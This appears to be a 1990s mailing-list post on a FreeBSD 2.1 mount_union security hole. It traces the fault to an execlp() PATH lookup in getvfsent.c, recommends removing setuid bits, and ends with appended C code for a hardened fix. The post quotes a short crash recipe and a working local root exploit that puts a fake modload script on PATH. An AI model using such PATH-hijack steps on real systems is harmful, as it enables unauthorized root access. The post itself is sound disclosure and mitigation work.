> FreeBSD has a security hole...
> dangerous is mount_union if suid is set
> vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
> probably FreeBSD 2.1 STABLE is not vulnerable
> to crash system (as a normal user) try this:
> mkdir a
> mkdir b
> mount_union ~/a ~/b
> mount_union -b ~/a ~/b

Hmm.... Needless to say, I've done a "chmod a-s /sbin/mount*" on all of the
FreeBSD machines I operate (all are 2.1.0-RELEASE with minor changes).
Ordinary users shouldn't be allowed to mount anything, anyway.

> to get euid try this:
> export PATH=/tmp:$PATH #if zsh, of course
> echo /bin/sh >/tmp/modload
> chmod +x /tmp/modload
> mount_union /dir1 /dir2
> and You are root!

Obviously, mount_union is depending on modload being on the $PATH, rather
than using "/sbin/modload". It seems this is not a bug in mount_union
itself, but in getvfsent.c...

/usr/src/lib/libc/gen/getvfsent.c:

[deletia]
        snprintf(name_mod, sizeof name_mod, "%s%s", name, "_mod");
        status = execlp("modload", "modload", "-e", name_mod, "-o", name_mod,
                        "-u", "-q", path, (const char *)0);
        exit(status ? errno : 0);
}
[EOF]

Clearly, execlp() should be calling modload as "/sbin/modload" instead.
Because this is a bug in getvfsent.c and not mount_union, it's possible that
other mount_* commands would have the same hole if suid root.

chmod a-s /sbin/mount*

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
| -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --                    |
===================================================================:)
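As an added illustration of the fix the post calls for (not code from the original post or from FreeBSD's getvfsent.c), here is how the modload invocation can be hardened so a setuid caller never depends on the user's PATH: the program path is a fixed absolute string, the child is started with execve() and a fixed environment, and anything that would need a PATH search is refused. The function names and the contents of the fixed environment are assumptions.

```c
/* Added example, not FreeBSD's code: a hardened form of the modload call
 * quoted from getvfsent.c. Function names and the fixed environment are
 * assumptions. Absolute program path, fixed env, no PATH search. */
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define MODLOAD_PATH "/sbin/modload"        /* fixed, no PATH lookup */

/* Environment handed to the helper; the caller's PATH never reaches it. */
static char *const safe_env[] = { "PATH=/sbin:/bin", NULL };

/* Assemble "<name>_mod" and the argument vector the original execlp() call
 * built, with argv[0] as an absolute path. argv needs room for 9 entries.
 * Returns 0 on success, -1 if the name would not fit in name_mod. */
int build_modload_argv(const char *name, const char *path,
                       char *name_mod, size_t name_mod_len,
                       char *argv[], size_t argv_len)
{
    if (argv_len < 9)
        return -1;
    if (snprintf(name_mod, name_mod_len, "%s_mod", name) >= (int)name_mod_len)
        return -1;                           /* truncated: refuse, don't guess */
    argv[0] = MODLOAD_PATH; argv[1] = "-e"; argv[2] = name_mod;
    argv[3] = "-o";         argv[4] = name_mod;
    argv[5] = "-u";         argv[6] = "-q";  argv[7] = (char *)path;
    argv[8] = NULL;
    return 0;
}

/* Fork and execve() prog with the fixed environment. Returns the child's
 * exit status, or -1 on error or if prog is not an absolute path. */
int run_fixed_helper(const char *prog, char *const argv[])
{
    if (prog == NULL || prog[0] != '/')
        return -1;                           /* would need a PATH search */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(prog, argv, safe_env);
        _exit(127);                          /* exec failed */
    }
    int st;
    if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st))
        return -1;
    return WEXITSTATUS(st);
}
```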